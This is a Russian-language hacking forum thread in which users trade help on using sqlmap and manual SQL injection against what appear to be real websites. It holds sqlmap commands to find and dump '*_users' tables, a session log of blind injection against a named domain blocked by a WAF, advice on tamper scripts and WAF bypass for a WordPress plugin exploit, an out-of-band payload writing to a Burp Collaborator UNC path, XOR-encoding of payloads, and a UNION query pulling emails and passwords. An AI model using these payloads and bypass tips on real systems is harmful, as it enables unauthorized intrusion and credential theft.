Как составить запрос в sqlmap, что бы он брал колонки с таблиц в которых содержится "*_users", то есть префиксы бывают разные (blabla1_users, blabla2_users и тд), чувствую что надо как то играться с параметром -T --where, буду очень благодарен за помощь.
sosidzh24
24.11.2019, 01:49
Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
karkajoi
24.11.2019, 02:53
sosidzh24 said:
↑ (https://antichat.live/posts/4347524/)
Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
--dump еще по идее надо
sosidzh24
24.11.2019, 05:15
karkajoi said:
↑ (https://antichat.live/posts/4347535/)
--dump еще по идее надо
на --batch он сам сдампит
panic.ker
26.11.2019, 02:44
-D information_schema -T columns -C table_name,column_name --where="table_name LIKE '%_users'" --dump
нееее, не так? =) dmjROVтестани, если тебе именно колумны с таблов где *_узерс повыводить ннада.
Или я не понял с недосыпа, поздновато уже.
Приветствую!
Ковыряю одну скулю:
SqlMap последней версии
web application technology: Apache, Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
ПРОБЛЕМА:При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
"cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
" [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"
--no-cast и --hex пробовал - не помогает.
Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом
Что это может быть? Какие возможные решения данной проблемы?
Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста
Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data)^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
BabaDook
23.12.2019, 09:18
Groove said:
↑ (https://antichat.live/posts/4353000/)
Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста
В настройках терминала
_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n parameter appears to be vulnerable to SQL injection attacks. The payload into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
Я как понял ни кто мне не подскажет
madik said:
↑ (https://antichat.live/posts/4353132/)
Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data
)^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
brown said:
↑ (https://antichat.live/posts/4353317/)
_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n
parameter appears to be vulnerable to SQL injection attacks. The payload
into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --
was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
fandor9 said:
↑ (https://antichat.live/posts/4354903/)
Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
поподробнее можно?
RedHazard
27.01.2020, 02:04
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
BabaDook
27.01.2020, 03:51
RedHazard said:
↑ (https://antichat.live/posts/4360092/)
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
Что?
RedHazard
28.01.2020, 03:31
BabaDook said:
↑ (https://antichat.live/posts/4360102/)
Что?
BabaDook
28.01.2020, 10:11
RedHazard said:
↑ (https://antichat.live/posts/4360297/)
View attachment 8872 (https://antichat.live/attachments/8872.img)
Ну, так и пиши команды.
RedHazard
29.01.2020, 00:30
BabaDook said:
↑ (https://antichat.live/posts/4360328/)
Ну, так и пиши команды.
ты наверное не увидел моего вопроса ?
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
BabaDook
29.01.2020, 09:21
RedHazard said:
↑ (https://antichat.live/posts/4360475/)
ты наверное не увидел моего вопроса ?
Если простой sql синиакс не работает, то тебе никто не поможет.
yuriy_ivanov
04.02.2020, 23:07
norther said:
↑ (https://antichat.live/posts/4349738/)
Приветствую!
Ковыряю одну скулю:
SqlMap последней версии
web application technology: Apache, Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
ПРОБЛЕМА:
При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
"cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
" [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"
--no-cast и --hex пробовал - не помогает.
Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом
Что это может быть? Какие возможные решения данной проблемы?
на слепую скорее всего прога выдала ложный вывод , добавь в строку --banner --fresh-queries .
как вариант ,запустить через ТОР + верболзция=3 , смотреть на что ругается и символы корректировать
hashfinderboss
06.02.2020, 11:28
Люди добрые ,подскажите ввожу
sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
получаю, имя бд
available databases [1]:
bd_upgrade_live
далее ввожу
sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables
таблица не выводит,пишет
[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
---
[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:12:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
[08:13:01] [INFO] retrieved:
[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
[08:13:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[08:14:27] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times
[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx (http://www.domen.mx)'
ending @ 08:14:27 /2020-02-06/
Обьясните пожалуйста почему так?
winstrool
06.02.2020, 16:14
hashfinderboss said:
↑ (https://antichat.live/posts/4362402/)
Люди добрые ,подскажите ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
получаю, имя бд
available databases [1]:
bd_upgrade_live
далее ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables
таблица не выводит,пишет
[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
---
[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:12:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
[08:13:01] [INFO] retrieved:
[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
[08:13:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[08:14:27] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times
[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/
www.domen.mx (http://www.domen.mx)
'
ending @ 08:14:27 /2020-02-06/
Обьясните пожалуйста почему так?
Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер
Andrey979
06.02.2020, 16:23
Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
BabaDook
06.02.2020, 22:33
Andrey979 said:
↑ (https://antichat.live/posts/4362464/)
Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
не может быть. Попробуйте поставить *
Andrey979
07.02.2020, 13:32
Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock) (http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5) ))rock))
Но в браузере пишет
403 Forbidden
A potentially unsafe operation has been detected in your request to this site
Как обойти этот WAF мапом?
Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
BabaDook
07.02.2020, 21:40
Andrey979 said:
↑ (https://antichat.live/posts/4362678/)
Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock) (http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5) ))rock))
Но в браузере пишет
403 Forbidden
A potentially unsafe operation has been detected in your request to this site
Как обойти этот WAF мапом?
Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
Andrey979
07.02.2020, 22:51
BabaDook said:
↑ (https://antichat.live/posts/4362900/)
Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
BabaDook
07.02.2020, 22:58
Andrey979 said:
↑ (https://antichat.live/posts/4362914/)
У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
В хроме переводчик есть а ещё есть поиск по форуму
может кто то помочь , привести в виду DIOSa ?
5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi
хотя тут юнион , но при этом выводит 1 запись оч долго
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot